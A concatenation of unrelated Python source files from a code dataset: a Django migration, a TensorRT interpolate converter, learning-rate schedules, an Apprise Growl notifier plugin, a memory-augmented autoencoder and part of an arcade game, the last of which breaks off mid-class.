# p = os.path.join(os.path.dirname(__file__), "mashcima/default_symbols/rest_breve")
# cv2.imwrite(p + ".png", s.mask * 255)
# with open(p + ".txt", "w") as f:
# f.write(str(-s.x) + " " + str(-s.y))
# inspect(mc.WHOLE_NOTES)
# inspect(mc.HALF_NOTES)
# inspect(mc.QUARTER_NOTES)
# inspect(mc.EIGHTH_NOTES)
# inspect(mc.SIXTEENTH_NOTES)
# inspect(mc.LONGA_RESTS)
# inspect(mc.BREVE_RESTS)
# inspect(mc.WHOLE_RESTS)
# inspect(mc.HALF_RESTS)
# inspect(mc.QUARTER_RESTS)
# inspect(mc.EIGHTH_RESTS)
# inspect(mc.SIXTEENTH_RESTS)
#
# inspect(mc.FLATS)
# inspect(mc.SHARPS)
# inspect(mc.NATURALS)
#
# inspect(mc.DOTS)
# inspect(mc.LEDGER_LINES)
# inspect(mc.BAR_LINES)
#
# inspect(mc.G_CLEFS)
# inspect(mc.F_CLEFS)
# inspect(mc.C_CLEFS)
#
# inspect(mc.TIME_MARKS["time_0"])
# inspect(mc.TIME_MARKS["time_1"])
# inspect(mc.TIME_MARKS["time_2"])
# inspect(mc.TIME_MARKS["time_3"])
# inspect(mc.TIME_MARKS["time_4"])
# inspect(mc.TIME_MARKS["time_5"])
# inspect(mc.TIME_MARKS["time_6"])
# inspect(mc.TIME_MARKS["time_7"])
# inspect(mc.TIME_MARKS["time_8"])
# inspect(mc.TIME_MARKS["time_9"])
# inspect(mc.TIME_MARKS["time_c"])
| StarcoderdataPython |
1782248 | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-11 18:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema: AnimeSeries and Figure tables plus their M2M link.

    Auto-generated by Django 1.9 ``makemigrations``; prefer creating a
    follow-up migration over hand-editing these operations.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='AnimeSeries',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mal_id', models.IntegerField(unique=True)),
                ('image_url', models.CharField(max_length=255, null=True)),
                ('title', models.CharField(max_length=255, null=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('last_figure_calc', models.DateTimeField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Figure',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mfc_id', models.IntegerField(unique=True)),
                ('barcode', models.CharField(max_length=16, null=True)),
                ('name', models.CharField(max_length=255)),
                ('release_date', models.DateTimeField(db_index=True, null=True)),
                ('price', models.IntegerField(null=True)),
                ('category', models.IntegerField(null=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
            ],
        ),
        # Many-to-many: a series references the figures released for it.
        migrations.AddField(
            model_name='animeseries',
            name='figures',
            field=models.ManyToManyField(to='anime.Figure'),
        ),
    ]
| StarcoderdataPython |
3284380 | import torch
from torch2trt.torch2trt import *
from torch2trt.module_test import add_module_test
from .size import IntWarper
@tensorrt_converter('torch.nn.functional.interpolate')
def convert_interpolate(ctx):
    """Convert ``torch.nn.functional.interpolate`` into a TensorRT resize layer.

    Handles static ``size``, float/tuple ``scale_factor``, and dynamic sizes
    carried by ``IntWarper`` values (which hold a TRT shape tensor in ``_trt``).
    """
    input = ctx.method_args[0]
    try:
        scale_factor = get_arg(ctx, 'scale_factor', pos=2, default=None)
    except KeyError:
        scale_factor = None
    # Normalize an int/float scale into one float per spatial dimension.
    if isinstance(scale_factor, int):
        scale_factor = float(scale_factor)
    if isinstance(scale_factor, float):
        scale_factor = tuple([scale_factor]*(len(input.shape)-2))
    try:
        size = get_arg(ctx, 'size', pos=1, default=None)
    except KeyError:
        size = None
    if isinstance(size, int):
        size = [size]
    try:
        mode = get_arg(ctx, 'mode', pos=3, default='nearest')
    except KeyError:
        mode = 'nearest'
    try:
        align_corners = get_arg(ctx, 'align_corners', pos=4, default=None)
    except KeyError:
        align_corners = False
    input_trt = trt_(ctx.network, input)
    output = ctx.method_return
    # A size containing any IntWarper entry is dynamic: build a runtime shape
    # tensor instead of baking static dimensions into the layer.
    is_shape_tensor = False
    if size is not None:
        for s in size:
            if isinstance(s, IntWarper):
                is_shape_tensor = True
                break
    if is_shape_tensor:
        shape_trt = []
        # tuple(input.shape[:(len(input.shape)-len(size))]) +
        size = tuple(size)
        for s in size:
            if isinstance(s, IntWarper):
                shape_trt.append(s._trt)
            else:
                const_shape_trt = trt_(ctx.network, input.new_tensor([s],dtype=torch.int32))
                shape_trt.append(const_shape_trt)
        # Prepend the untouched leading (batch/channel) dims of the input.
        pre_input_shape_trt = tensor_trt_get_shape_trt(ctx.network, input_trt, 0, (len(input.shape)-len(size)))
        shape_trt = [pre_input_shape_trt] + shape_trt
        shape_trt = ctx.network.add_concatenation(shape_trt).get_output(0)
    layer = ctx.network.add_resize(input_trt)
    if is_shape_tensor:
        layer.set_input(1, shape_trt)
    elif scale_factor is not None:
        # Leading 1s keep batch and channel dimensions unscaled.
        scale_factor = (1,)*2 + tuple(scale_factor)
        layer.scales = scale_factor
    else:
        # Fall back to the statically traced output shape.
        layer.shape = tuple(output.shape)
    layer.align_corners = align_corners
    if mode=="nearest":
        layer.resize_mode = trt.ResizeMode.NEAREST
    elif mode=="linear":
        layer.resize_mode = trt.ResizeMode.LINEAR
    else:
        # Any other mode (e.g. 'bilinear', 'trilinear') maps onto TRT LINEAR.
        layer.resize_mode = trt.ResizeMode.LINEAR
        print("unknown interpolate type, use linear insteed.")
    output._trt = layer.get_output(0)
class InterpolateTest(torch.nn.Module):
    """Thin nn.Module wrapper around F.interpolate for converter unit tests."""

    def __init__(self, size=None, scale_factor=None, mode='nearest'):
        super(InterpolateTest, self).__init__()
        self.size = size
        self.scale_factor = scale_factor
        self.mode = mode

    def forward(self, x):
        # align_corners is only legal for non-'nearest' modes.
        align_corners = True if self.mode != 'nearest' else None
        return torch.nn.functional.interpolate(
            x,
            size=self.size,
            scale_factor=self.scale_factor,
            mode=self.mode,
            align_corners=align_corners)
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_size_int_nearest():
    # Nearest resize to size=2 across 3D/4D/5D inputs.
    return InterpolateTest(2, mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_size_3d_nearest():
    # Nearest resize with a 1-tuple size on a 3D input.
    return InterpolateTest((2,), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_size_4d_nearest():
    # Nearest resize with a 2-tuple size on a 4D input.
    return InterpolateTest((2, 3), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
def test_interpolate_size_5d_nearest():
    # Nearest resize with a 3-tuple size on a 5D input.
    return InterpolateTest((2, 3, 4), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_size_int_linear():
    # Bilinear resize to size=2 (exercises align_corners=True path).
    return InterpolateTest(2, mode='bilinear')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_size_4d_linear():
    # Bilinear resize with a 2-tuple size on a 4D input.
    return InterpolateTest((2, 3), mode='bilinear')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_scale_int_nearest():
    # Nearest resize by a uniform float scale across 3D/4D/5D inputs.
    return InterpolateTest(scale_factor=2., mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_scale_3d_nearest():
    # Fixed: `(4.)` is just the float 4.0 -- the 1-tuple this "3d" test is
    # meant to exercise needs a trailing comma. Numerically equivalent for
    # the converter (floats are expanded to per-dim tuples), but this now
    # actually covers the tuple code path.
    return InterpolateTest(scale_factor=(4.,), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_scale_4d_nearest():
    # Nearest resize with per-dimension scales on a 4D input.
    return InterpolateTest(scale_factor=(4., 5.), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
def test_interpolate_scale_5d_nearest():
    # Nearest resize with per-dimension scales on a 5D input.
    return InterpolateTest(scale_factor=(4., 5., 6.), mode='nearest')
4807784 | <filename>src/schedule.py
import torch
import math
class BaseLearningRateSchedule(object):
    """Stateful LR multiplier: subclasses define how decay_rate evolves per step."""

    def __init__(self):
        self.step_num = 0
        self.decay_rate = 1.

    def set_lr(self, optimizer, init_lr):
        """Write ``init_lr * decay_rate`` into every param group of *optimizer*."""
        scaled = init_lr * self.decay_rate
        for group in optimizer.param_groups:
            group['lr'] = scaled

    def step(self):
        """Advance one step and recompute the decay rate."""
        self.step_num += 1
        self.update_decay_rate()

    def pack_state(self):
        """Serialize schedule state for checkpointing."""
        return {"step": self.step_num, "decay_rate": self.decay_rate}

    def restore_state(self, pkg):
        """Inverse of :meth:`pack_state`."""
        self.step_num = pkg['step']
        self.decay_rate = pkg['decay_rate']

    def update_decay_rate(self):
        """Subclasses must recompute ``self.decay_rate`` from ``self.step_num``."""
        raise NotImplementedError()
def compute_polynomial_intep(x, x0, y0, x1, y1, power):
    """Interpolate between (x0, y0) and (x1, y1) with a polynomial ramp.

    The fractional position of *x* in [x0, x1] is raised to *power* before
    mixing y0 and y1; values outside the interval clamp to the endpoints.
    """
    if x < x0:
        return y0
    if x > x1:
        return y1
    # The old `power != 1.0` special case was redundant: f ** 1.0 == f.
    f = ((1.0 * x - x0) / (x1 - x0)) ** power
    return y0 + f * (y1 - y0)
def compute_linear_intep(x, x0, y0, x1, y1):
    """Linear interpolation: the power-1.0 case of the polynomial ramp."""
    return compute_polynomial_intep(x, x0, y0, x1, y1, 1.0)
class LinearLearningRateSchedule(BaseLearningRateSchedule):
    """Decay rate follows the straight line (x0, y0) -> (x1, y1) in step units."""

    def __init__(self, x0, y0, x1, y1):
        super(LinearLearningRateSchedule, self).__init__()
        self.x0, self.y0 = x0, y0
        self.x1, self.y1 = x1, y1

    def pack_state(self):
        """Serialize counter, decay rate, and line endpoints."""
        return {
            "step": self.step_num,
            "decay_rate": self.decay_rate,
            "x0": self.x0,
            "x1": self.x1,
            "y0": self.y0,
            "y1": self.y1,
        }

    def restore_state(self, pkg):
        """Inverse of :meth:`pack_state`."""
        self.step_num = pkg['step']
        self.decay_rate = pkg['decay_rate']
        self.x0, self.x1 = pkg['x0'], pkg['x1']
        self.y0, self.y1 = pkg['y0'], pkg['y1']

    def update_decay_rate(self):
        self.decay_rate = compute_linear_intep(
            self.step_num, self.x0, self.y0, self.x1, self.y1)
class WarmupLinearLearningRateSchedule(BaseLearningRateSchedule):
    """Linear warmup from 0 to y0 over ``warmup_step`` steps, then the
    (x0, y0) -> (x1, y1) line.

    The effective rate is the min of the two segments, so warmup dominates
    early and the decay line afterwards (assumes a non-increasing decay
    line, i.e. y1 <= y0 -- confirm for other configurations).
    """

    def __init__(self, warmup_step, x0, y0, x1, y1):
        super(WarmupLinearLearningRateSchedule, self).__init__()
        self.warmup_step = warmup_step
        self.x0, self.y0 = x0, y0
        self.x1, self.y1 = x1, y1

    def pack_state(self):
        """Serialize counter, decay rate, warmup length and line endpoints."""
        return {
            "step": self.step_num,
            "decay_rate": self.decay_rate,
            "warmup_step": self.warmup_step,
            "x0": self.x0,
            "x1": self.x1,
            "y0": self.y0,
            "y1": self.y1,
        }

    def restore_state(self, pkg):
        """Inverse of :meth:`pack_state`."""
        self.step_num = pkg['step']
        self.decay_rate = pkg['decay_rate']
        self.warmup_step = pkg['warmup_step']
        self.x0, self.x1 = pkg['x0'], pkg['x1']
        self.y0, self.y1 = pkg['y0'], pkg['y1']

    def update_decay_rate(self):
        warmup = compute_linear_intep(self.step_num, 0,
                                      0, self.warmup_step, self.y0)
        decay = compute_linear_intep(self.step_num, self.x0,
                                     self.y0, self.x1, self.y1)
        self.decay_rate = min(warmup, decay)
3281099 | <filename>apprise/plugins/NotifyGrowl/NotifyGrowl.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 <NAME> <<EMAIL>>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from .gntp import notifier
from .gntp import errors
from ..NotifyBase import NotifyBase
from ...common import NotifyImageSize
from ...common import NotifyType
# Priorities
class GrowlPriority(object):
    """Symbolic Growl notification priority levels (integer range -2 .. 2)."""
    LOW = -2
    MODERATE = -1
    NORMAL = 0
    HIGH = 1
    EMERGENCY = 2
# Every accepted priority value; used to validate user-supplied priorities.
GROWL_PRIORITIES = (
    GrowlPriority.LOW,
    GrowlPriority.MODERATE,
    GrowlPriority.NORMAL,
    GrowlPriority.HIGH,
    GrowlPriority.EMERGENCY,
)

# Notification class name registered with (and later sent to) the Growl server.
GROWL_NOTIFICATION_TYPE = "New Messages"
class NotifyGrowl(NotifyBase):
    """
    A wrapper to Growl Notifications (GNTP over the network).

    Registers the application with the target Growl server at construction
    time and sends notifications via :meth:`send`.
    """

    # The default descriptive name associated with the Notification
    service_name = 'Growl'

    # The services URL
    service_url = 'http://growl.info/'

    # The default protocol
    protocol = 'growl'

    # A URL that takes you to the setup/help of the specific protocol
    setup_url = 'https://github.com/caronc/apprise/wiki/Notify_growl'

    # Allows the user to specify the NotifyImageSize object
    image_size = NotifyImageSize.XY_72

    # Disable throttle rate for Growl requests since they are normally
    # local anyway
    request_rate_per_sec = 0

    # A title can not be used for Growl Messages. Setting this to zero will
    # cause any title (if defined) to get placed into the message body.
    title_maxlen = 0

    # Limit results to just the first 10 line otherwise there is just to much
    # content to display
    body_max_line_count = 2

    # Default Growl Port
    default_port = 23053

    def __init__(self, priority=None, version=2, **kwargs):
        """
        Initialize Growl Object and register with the Growl server.

        Raises TypeError when registration fails (network, auth, or
        unsupported-protocol errors from gntp).
        """
        super(NotifyGrowl, self).__init__(**kwargs)

        if not self.port:
            self.port = self.default_port

        # The Priority of the message; fall back to NORMAL on invalid input.
        if priority not in GROWL_PRIORITIES:
            self.priority = GrowlPriority.NORMAL
        else:
            self.priority = priority

        # Always default the sticky flag to False
        self.sticky = False

        # Store Version (2 uses URL-based icons; 1 sends raw icon bytes)
        self.version = version

        payload = {
            'applicationName': self.app_id,
            'notifications': [GROWL_NOTIFICATION_TYPE, ],
            'defaultNotifications': [GROWL_NOTIFICATION_TYPE, ],
            'hostname': self.host,
            'port': self.port,
        }

        if self.password is not None:
            # FIX: the password value had been clobbered by a redaction
            # placeholder ("<PASSWORD>"), which is not even valid Python;
            # restore passing the configured password through to gntp.
            payload['password'] = self.password

        self.logger.debug('Growl Registration Payload: %s' % str(payload))
        self.growl = notifier.GrowlNotifier(**payload)

        try:
            self.growl.register()
            self.logger.debug(
                'Growl server registration completed successfully.'
            )

        except errors.NetworkError:
            self.logger.warning(
                'A network error occured sending Growl '
                'notification to %s.' % self.host)
            raise TypeError(
                'A network error occured sending Growl '
                'notification to %s.' % self.host)

        except errors.AuthError:
            self.logger.warning(
                'An authentication error occured sending Growl '
                'notification to %s.' % self.host)
            raise TypeError(
                'An authentication error occured sending Growl '
                'notification to %s.' % self.host)

        except errors.UnsupportedError:
            self.logger.warning(
                'An unsupported error occured sending Growl '
                'notification to %s.' % self.host)
            raise TypeError(
                'An unsupported error occured sending Growl '
                'notification to %s.' % self.host)

        return

    def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
        """
        Perform Growl Notification.

        Returns True on (apparent) success, False otherwise. Since Growl
        uses UDP-style delivery there is no acknowledgement for most
        failure modes.
        """
        icon = None
        if self.version >= 2:
            # URL Based
            icon = self.image_url(notify_type)
        else:
            # Raw
            icon = self.image_raw(notify_type)

        payload = {
            'noteType': GROWL_NOTIFICATION_TYPE,
            'title': title,
            'description': body,
            'icon': icon is not None,
            'sticky': False,
            'priority': self.priority,
        }
        self.logger.debug('Growl Payload: %s' % str(payload))

        # Update icon of payload to be raw data; this is intentionally done
        # here after we spit the debug message above (so we don't try to
        # print the binary contents of an image
        payload['icon'] = icon

        # Always call throttle before any remote server i/o is made
        self.throttle()

        try:
            response = self.growl.notify(**payload)
            if not isinstance(response, bool):
                self.logger.warning(
                    'Growl notification failed to send with response: %s' %
                    str(response),
                )

            else:
                self.logger.info('Sent Growl notification.')

        except errors.BaseError as e:
            # Since Growl servers listen for UDP broadcasts, it's possible
            # that you will never get to this part of the code since there is
            # no acknowledgement as to whether it accepted what was sent to it
            # or not.

            # However, if the host/server is unavailable, you will get to this
            # point of the code.
            self.logger.warning(
                'A Connection error occured sending Growl '
                'notification to %s.' % self.host)
            self.logger.debug('Growl Exception: %s' % str(e))

            # Return; we're done
            return False

        return True

    def url(self):
        """
        Returns the URL built dynamically based on specified arguments.
        """

        _map = {
            GrowlPriority.LOW: 'low',
            GrowlPriority.MODERATE: 'moderate',
            GrowlPriority.NORMAL: 'normal',
            GrowlPriority.HIGH: 'high',
            GrowlPriority.EMERGENCY: 'emergency',
        }

        # Define any arguments set
        args = {
            'format': self.notify_format,
            'overflow': self.overflow_mode,
            'priority':
                _map[GrowlPriority.NORMAL] if self.priority not in _map
                else _map[self.priority],
            'version': self.version,
        }

        auth = ''
        if self.password:
            # In growl:// URLs the single credential slot carries the
            # password; parse_url() mirrors this by copying user -> password.
            auth = '{password}@'.format(
                password=self.quote(self.user, safe=''),
            )

        return '{schema}://{auth}{hostname}{port}/?{args}'.format(
            schema=self.secure_protocol if self.secure else self.protocol,
            auth=auth,
            hostname=self.host,
            port='' if self.port is None or self.port == self.default_port
                 else ':{}'.format(self.port),
            args=self.urlencode(args),
        )

    @staticmethod
    def parse_url(url):
        """
        Parses the URL and returns enough arguments that can allow
        us to substantiate this object.
        """
        results = NotifyBase.parse_url(url)

        if not results:
            # We're done early as we couldn't load the results
            return results

        # Apply our settings now
        version = None
        if 'version' in results['qsd'] and len(results['qsd']['version']):
            # Allow the user to specify the version of the protocol to use.
            try:
                version = int(
                    NotifyBase.unquote(
                        results['qsd']['version']).strip().split('.')[0])

            except (AttributeError, IndexError, TypeError, ValueError):
                NotifyBase.logger.warning(
                    'An invalid Growl version of "%s" was specified and will '
                    'be ignored.' % results['qsd']['version']
                )
                pass

        if 'priority' in results['qsd'] and len(results['qsd']['priority']):
            # Only the first letter of the priority name is significant.
            _map = {
                'l': GrowlPriority.LOW,
                'm': GrowlPriority.MODERATE,
                'n': GrowlPriority.NORMAL,
                'h': GrowlPriority.HIGH,
                'e': GrowlPriority.EMERGENCY,
            }
            try:
                results['priority'] = \
                    _map[results['qsd']['priority'][0].lower()]

            except KeyError:
                # No priority was set
                pass

        # Because of the URL formatting, the password is actually where the
        # username field is. For this reason, we just preform this small hack
        # to make it (the URL) conform correctly. The following strips out the
        # existing password entry (if exists) so that it can be swapped with
        # the new one we specify.
        if results.get('password', None) is None:
            results['password'] = results.get('user', None)

        if version:
            results['version'] = version

        return results
| StarcoderdataPython |
1709349 | <reponame>saikumarkethi/memae-anomaly-detection
from __future__ import absolute_import, print_function
import torch
from torch import nn
from models import MemModule
class AutoEncoderCov3DMem(nn.Module):
    """Memory-augmented 3D convolutional autoencoder (MemAE).

    The encoder downsamples a ``chnum_in x T x H x W`` clip by a factor of
    (8, 16, 16) into 256 feature channels, the memory module re-expresses
    each feature as a sparse combination of learned memory items, and the
    decoder mirrors the encoder back to the input resolution.
    """
    def __init__(self, chnum_in, mem_dim, shrink_thres=0.0025):
        """chnum_in: input channels; mem_dim: number of memory slots;
        shrink_thres: hard-shrinkage threshold for attention sparsity."""
        super(AutoEncoderCov3DMem, self).__init__()
        print('AutoEncoderCov3DMem')
        self.chnum_in = chnum_in
        feature_num = 128
        feature_num_2 = 96
        feature_num_x2 = 256
        # Four conv stages; the first keeps the temporal dim (stride (1,2,2)),
        # the rest halve all three dims (stride (2,2,2)).
        self.encoder = nn.Sequential(
            nn.Conv3d(self.chnum_in, feature_num_2, (3, 3, 3), stride=(1, 2, 2), padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num_2),
            nn.LeakyReLU(0.2, inplace=True),
            nn.Conv3d(feature_num_2, feature_num, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num),
            nn.LeakyReLU(0.2, inplace=True),
            nn.Conv3d(feature_num, feature_num_x2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num_x2),
            nn.LeakyReLU(0.2, inplace=True),
            nn.Conv3d(feature_num_x2, feature_num_x2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num_x2),
            nn.LeakyReLU(0.2, inplace=True)
        )
        self.mem_rep = MemModule(mem_dim=mem_dim, fea_dim=feature_num_x2, shrink_thres =shrink_thres)
        # Mirror of the encoder; the final stage restores the temporal dim
        # with stride (1,2,2) and maps back to chnum_in channels.
        self.decoder = nn.Sequential(
            nn.ConvTranspose3d(feature_num_x2, feature_num_x2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1),
                               output_padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num_x2),
            nn.LeakyReLU(0.2, inplace=True),
            nn.ConvTranspose3d(feature_num_x2, feature_num, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1),
                               output_padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num),
            nn.LeakyReLU(0.2, inplace=True),
            nn.ConvTranspose3d(feature_num, feature_num_2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1),
                               output_padding=(1, 1, 1)),
            nn.BatchNorm3d(feature_num_2),
            nn.LeakyReLU(0.2, inplace=True),
            nn.ConvTranspose3d(feature_num_2, self.chnum_in, (3, 3, 3), stride=(1, 2, 2), padding=(1, 1, 1),
                               output_padding=(0, 1, 1))
        )
    def forward(self, x):
        """Encode, address memory, decode.

        Returns a dict: 'output' is the reconstruction, 'att' the memory
        attention weights produced by the memory module.
        """
        f = self.encoder(x)
        res_mem = self.mem_rep(f)
        f = res_mem['output']
        att = res_mem['att']
        output = self.decoder(f)
        return {'output': output, 'att': att}
| StarcoderdataPython |
1607851 | """
Starting Template
Once you have learned how to use classes, you can begin your program with this
template.
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.starting_template
"""
import arcade
import random
import math
from Criteria import *
# Window geometry and title.
SCREEN_WIDTH = 1280
SCREEN_HEIGHT = 720
SCREEN_TITLE = "Triplicate"
# Default downward velocity applied to falling objects (pixels per tick).
DEFAULT_GRAVITY = -3
RESOURCE_PATH = "resources"
# Registry of Level instances (populated elsewhere).
levels = []
# ON_KEY_RELEASE: apply a negative movement vector on key release.
ON_KEY_RELEASE = False
class ObjectLoader:
    """Base class for spawners: load(tick) returns a new game object or None."""
    def __init__(self):
        pass
    def load(self, tick):
        # Subclasses return an object to spawn on this tick, or None.
        pass
class Factory:
    """Base class for object factories: create() builds one game object."""
    def create(self):
        # Subclasses return a newly constructed game object.
        pass
class FormFactory(Factory):
    """Factory producing Form objects of a fixed color/value."""

    def __init__(self, color, val):
        self.color, self.val = color, val

    def create(self):
        """Build a new Form with this factory's color and value."""
        return Form(self.color, self.val)
class CarFactory(Factory):
    """Factory producing SwervingCar1Up objects of a fixed color/value."""

    def __init__(self, color, val):
        self.color, self.val = color, val

    def create(self):
        """Build a new SwervingCar1Up with this factory's color and value."""
        return SwervingCar1Up(self.color, self.val)
class ShipFactory(Factory):
    """Factory producing Ship objects of a fixed color/value/level."""

    def __init__(self, color, val, level):
        self.color, self.val = color, val
        self.level = level

    def create(self):
        """Build a new Ship bound to this factory's level."""
        return Ship(self.color, self.val, self.level)
class PoopFactory(Factory):
    """Factory producing Poop objects of a fixed color/value."""

    def __init__(self, color, val):
        self.color, self.val = color, val

    def create(self):
        """Build a new Poop with this factory's color and value."""
        return Poop(self.color, self.val)
class FactoryWeight:
    """Pairs a factory with the slice of 0-99 dice rolls that selects it."""

    def __init__(self, factory, r):
        self.factory, self.range = factory, r
def GetLaneCenter(j):
    """Return the x-coordinate of the center of lane *j* (0-4)."""
    lane_width = 160
    lanes_total = lane_width * 5
    left_edge = (SCREEN_WIDTH / 2) - (lanes_total / 2)
    return left_edge + j * lane_width + lane_width / 2
class WeightedObjectLaneLoader(ObjectLoader):
    """Weighted random spawner that also drops each object into a random lane."""

    def __init__(self, tr, factories):
        super().__init__()
        self.tr = tr                # spawn period in ticks
        self.factories = factories  # sequence of FactoryWeight entries
        self.t = 0                  # number of spawn attempts so far

    def load(self, tick):
        """Every tr-th tick, roll 0-99 and spawn from the matching factory."""
        if tick % self.tr != 0:
            return None
        self.t += 1
        roll = random.randrange(0, 100)
        for weighted in self.factories:
            if roll in weighted.range:
                obj = weighted.factory.create()
                obj.center_x = GetLaneCenter(random.randrange(0, 5))
                return obj
        return None
class WeightedObjectLoader(ObjectLoader):
    """Weighted random spawner: every tr ticks, roll 0-99 and pick a factory."""

    def __init__(self, tr, factories):
        super().__init__()
        self.tr = tr                # spawn period in ticks
        self.factories = factories  # sequence of FactoryWeight entries
        self.t = 0                  # number of spawn attempts so far

    def load(self, tick):
        """Return a spawned object on qualifying ticks, else None."""
        if tick % self.tr != 0:
            return None
        self.t += 1
        roll = random.randrange(0, 100)
        for weighted in self.factories:
            if roll in weighted.range:
                return weighted.factory.create()
        return None
class SequenceFactoryObjectLoader(ObjectLoader):
    """Spawns objects from a fixed sequence of factories, one per tr ticks."""

    def __init__(self, tr, objects):
        super().__init__()
        self.tr = tr            # spawn period in ticks
        self.objects = objects  # factories, consumed from the end via pop()
        # FIX: self.t was never initialized, so load() crashed with
        # AttributeError on its first qualifying tick.
        self.t = 0

    def load(self, tick):
        """Pop the next factory every tr-th tick and return its product."""
        if tick % self.tr == 0:
            self.t += 1
            if len(self.objects) > 0:
                # FIX: factories expose create(), not load() -- every Factory
                # subclass in this module defines create(); .load() would
                # have raised AttributeError.
                return self.objects.pop().create()
        return None
class SequenceObjectLoader(ObjectLoader):
    """Spawns pre-built objects from a fixed sequence, one per tr ticks."""

    def __init__(self, tr, objects):
        super().__init__()
        self.tr = tr            # spawn period in ticks
        self.objects = objects  # objects, consumed from the end via pop()
        # FIX: self.t was never initialized, so load() crashed with
        # AttributeError on its first qualifying tick.
        self.t = 0

    def load(self, tick):
        """Pop and return the next object every tr-th tick; None otherwise."""
        if tick % self.tr == 0:
            self.t += 1
            # FIX: guard the pop -- the old code raised IndexError once the
            # sequence was exhausted (its sibling SequenceFactoryObjectLoader
            # already guards this case).
            if len(self.objects) > 0:
                return self.objects.pop()
        return None
class RBObjectLoader(ObjectLoader):
    """Alternating red/blue Form spawner; the color flips every 180 ticks.

    Note: unlike the other loaders, this returns a Form on *every* tick.
    """

    def __init__(self):
        self.Toggle = True

    def load(self, tick):
        if tick % 180 == 0:
            self.Toggle = not self.Toggle
        color, tag = ((255, 0, 0, 255), "R") if self.Toggle else ((0, 0, 255, 255), "B")
        return Form(color, tag)
class RGBObjectLoader(ObjectLoader):
    """Cycles red -> green -> blue, emitting one Form every 180 ticks."""

    def __init__(self):
        self.t = 0

    def load(self, tick):
        if tick % 180 != 0:
            return None
        self.t += 1
        palette = {
            0: ((255, 0, 0, 255), "R"),
            1: ((0, 255, 0, 255), "G"),
            2: ((0, 0, 255, 255), "B"),
        }
        color, tag = palette[self.t % 3]
        return Form(color, tag)
class RBPObjectLoader(ObjectLoader):
    """Every 180 ticks, randomly emits a red Form, a green Poop, or a blue Form."""

    def __init__(self):
        self.t = 0

    def load(self, tick):
        if tick % 180 != 0:
            return None
        self.t += 1
        roll = random.randrange(0, 3)
        if roll == 0:
            return Form((255, 0, 0, 255), "R")
        if roll == 1:
            return Poop((0, 255, 0, 255), "G")
        return Form((0, 0, 255, 255), "B")
class RGBPObjectLoader(ObjectLoader):
    """Every tr ticks, emits an R/G/B Form or a white Poop, uniformly at random."""

    def __init__(self, tr):
        self.t = 0
        self.tr = tr

    def load(self, tick):
        if tick % self.tr != 0:
            return None
        self.t += 1
        roll = random.randrange(0, 4)
        if roll == 0:
            return Form((255, 0, 0, 255), "R")
        if roll == 1:
            return Form((0, 255, 0, 255), "G")
        if roll == 2:
            return Form((0, 0, 255, 255), "B")
        return Poop((255, 255, 255, 255), "S")
class Level:
    def __init__(self):
        """Initialize empty level state; sprite lists are attached later.

        NOTE(review): self.length is read by draw() but never set here --
